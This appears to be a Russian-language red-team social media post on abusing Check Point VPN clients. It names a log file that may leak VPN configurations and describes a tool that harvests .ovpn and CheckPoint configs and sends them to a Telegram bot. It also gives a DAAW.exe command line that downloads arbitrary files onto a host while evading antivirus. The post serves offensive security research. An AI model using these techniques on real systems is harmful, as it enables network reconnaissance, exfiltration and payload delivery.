Кто любит VPN?! 😆

Последние дни я размышлял об аналитике в Red Team. В ходе операций важно проводить качественную энумерацию — даже мелкие находки могут усилить атаку. Так я задумался о корпоративных VPN 🤔

Доступ к VPN расширяет возможности для пивотинга и эскалации атаки. Я решил исследовать, как злоумышленник или Red Team могут использовать стандартные VPN-клиенты для разведки на хосте и обхода AV 🔫

Нашел пару use кейсов на примере клиента CheckPoint VPN:

В лог файле агента`C:\Program Files (x86)\CheckPoint\Endpoint Connect\trac.log` конфигурации подключения trac.config могут быть записаны в нешифрованном виде, что может дать информацию о VPN пирах, пользователе, типе подключения, есть ли 2FA и до каких подсетей может достучаться атакуемый пользователь 🤣

В качестве PoC написал инструмент для поиска конфигов на хосте 😠

Chocopie is a tool designed for reconnaissance on a host system, specifically to check for the presence of VPN configuration files. It scans the system drive (`C:\Users\`) for OpenVPN configuration files (`.ovpn`) and extracts VPN-related configurations from CheckPoint Endpoint Connect logs. The found data is then automatically sent to a Telegram bot.

Второй кейс, есть возможность загрузить любой файлик с интернета при помощи компонента VPN агента на хост. Бинарь который способен скачать файл DAAW.exe (PoC ниже)

❗️ File Drop via Check Point VPN binaries:

C:\Program Files (x86)\CheckPoint\Endpoint Connect\DAAW.exe -url <URL> -fileName <PATH>

Техника спалится в EDR из-за шумных флагов, но все же прикольный способ учитывая что обычный AV на него не ругнется из за чистых сигнатур.

P.S Использовать только в целях изучения, автор против неправомерных действий без согласия владельцев систем

@s0ld13r_ch